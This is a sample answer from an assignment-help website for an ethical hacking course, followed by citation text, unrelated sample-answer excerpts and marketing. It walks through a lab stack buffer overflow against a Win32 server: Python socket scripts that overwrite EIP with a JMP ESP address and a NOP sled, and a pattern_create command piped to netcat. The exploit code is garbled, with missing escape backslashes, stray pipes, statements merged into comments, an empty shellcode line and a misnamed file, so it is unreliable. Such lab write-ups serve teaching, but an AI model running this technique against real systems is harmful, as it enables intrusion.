You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.
Exploit development is conducted to gaining control over a computer system while taking advantages of the bugs and vulnerability allowing privilege escalation or a denial of service attack. The development process contains several phases and need to complete the previous one to move further.
Initiation phase: the whole development process was conducted on Linux platform. Firstly, Win32 buffer victim virtual machine needs to be opened after opening the Kali virtual machine. These two virtual machines need to be set to NAT networking while checking the iP address of both machines.
#!/usr/bin/python
|
import sys
|
import os
|
import socket
|
host = sys.argv[1]
|
port = int(sys.argv[2])
|
port = int(sys.argv[2]) # Testing buffer = "x41"*500 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
con = s.connect((host, port)) s.send(buffer) s.close()
|
In the windows host, immediate debugger needs to open and run the server.exe. the exection process was started by pressing F9 key. Then a python file was created with the name”arrack.py”. Python codes are attached. Then the command “python attack.py IP_ADDRESS 1337”. The IP address is the address of the windows virtual machine. Then we swap to the Windows environment and press shift+F9 to pass the exception to the executable.
We can see that EIP now contains our value, as does EBP. Whilst ESP points to a region of memory which contains our injected value.
In this phase, server.exe was restarted by pressing CTRL + F2 within immunity debugger. Then the execution process was initiated by pressing F9. The directory also needs to be change into metasploit by running running cd /usr/share/metasploit-framework/tools/exploit. Run ./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337 within Kali, where IP_ADDRESS is the IP address of the Windows VM. Then press SHIFT +F9 within Immunity debugger to pass the exception. Run “./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. Now we must determine an address for code which will jump to ESP.
The attack.py modified as follows:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "x41"*260
# Overwrite EIP with JMP ESP
buffer += "x78x16xF3x77"
# NOPSLED
buffer += "x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
To export a reference to this article please select a referencing stye below:
My Assignment Help. (2021). Ethical Hacking And Defence. Retrieved from https://myassignmenthelp.com/free-samples/csi5208-ethical-hacking-and-defence/weaponzing-the-vulnerability.html.
"Ethical Hacking And Defence." My Assignment Help, 2021, https://myassignmenthelp.com/free-samples/csi5208-ethical-hacking-and-defence/weaponzing-the-vulnerability.html.
My Assignment Help (2021) Ethical Hacking And Defence [Online]. Available from: https://myassignmenthelp.com/free-samples/csi5208-ethical-hacking-and-defence/weaponzing-the-vulnerability.html
[Accessed 19 April 2021].
My Assignment Help. 'Ethical Hacking And Defence' (My Assignment Help, 2021) <https://myassignmenthelp.com/free-samples/csi5208-ethical-hacking-and-defence/weaponzing-the-vulnerability.html> accessed 19 April 2021.
My Assignment Help. Ethical Hacking And Defence [Internet]. My Assignment Help. 2021 [cited 19 April 2021]. Available from: https://myassignmenthelp.com/free-samples/csi5208-ethical-hacking-and-defence/weaponzing-the-vulnerability.html.
It is time to end your struggle with the referencing styles. You just have to visit MyAssignmenthelp.com to get authentic referencing results regarding major styles, such as MLA referencing, APA referencing, etc. The service is free of cost and offers immediate results. If you are working on Harvard referencing, you just need to type in the necessary details in the Harvard reference generator. The tool will provide you with accurately formed referencing. Thus, you do not have to waste time searching for Harvard or APA referencing guide on the Internet. The service is tailor-made to serve your purpose.
Answer: Introduction The main aim of this project is to develop a naive command line text based user interface to access the memory database. The c source code is used have used for the command line interface. All the data must be stored in the directory of memory database. The user can enter all the commands on a single line command to interact with the memory database. Description To create the naïve interface, the text based command...
Read MoreAnswer: To develop the Bright College Management system, Java programming language is used. Java is an object-Oriented language and is the most appropriate language to use to develop the proposed system. By using different Object Oriented design patterns, the proposed application will be able to take advantage of most important object oriented design patterns like encapsulation and method overriding. To demonstrate the design of the propose...
Read MoreAnswer: The implemented program is a product in a shop hhaving a particular quantity in stock, minimum stock level, and when this is reached it indicates that the product needs to be reordered and a reorder amount.The class product is designed to model a product where by it has the following attributes which are defined as varibles in the product class. String name- which is the name of the product int quantity- which...
Read MoreAnswer: Bigelow et al. (2015) opined that memory management is one of the big issues in fundamental programming. Though, it's an important aspect to manage memory in the programming environment using C++ [1]. Lakhotia, Harman and Gross (2013) stated that smart pointers are the class objects which look as well as feel like pointer, but they are smarter [2]. This report is designed to explain the use of C++ language in memory manage...
Read MoreAnswer Introduction The internet has moved on by many a miles over the past years. People now use the internet from various devices that range from desktop computers, laptops, tablets and smartphones. Responsive web design or RWD is one of the most commonly used web designing approaches in the modern technological era (Mohammad & Tomberg, 2013). Through this approach only one website interface is designed and it is meant to suffice the ne...
Read MoreJust share requirement and get customized Solution.
Orders
Overall Rating
Experts
Our writers make sure that all orders are submitted, prior to the deadline.
Using reliable plagiarism detection software, Turnitin.com.We only provide customized 100 percent original papers.
Feel free to contact our assignment writing services any time via phone, email or live chat. If you are unable to calculate word count online, ask our customer executives.
Our writers can provide you professional writing assistance on any subject at any level.
Our best price guarantee ensures that the features we offer cannot be matched by any of the competitors.
Get all your documents checked for plagiarism or duplicacy with us.
Get different kinds of essays typed in minutes with clicks.
Calculate your semester grades and cumulative GPa with our GPA Calculator.
Balance any chemical equation in minutes just by entering the formula.
Calculate the number of words and number of pages of all your academic documents.
Our Mission Client Satisfaction
It was perfect I don\'t have to get it redone really on point and very happy with it thanks so much. You guys are a lifesaver
Australia
Good work from them!! Great service!! They didn’t make me wait on my work I got it on time!!
Australia
a great work. to be honest i was\'t sure if the expert would get everything right, but it turned really well.
Australia
The work has been done properly, exactly as required. I\'m very happy with it. Thanks to the expert for such a masterpiece.
Australia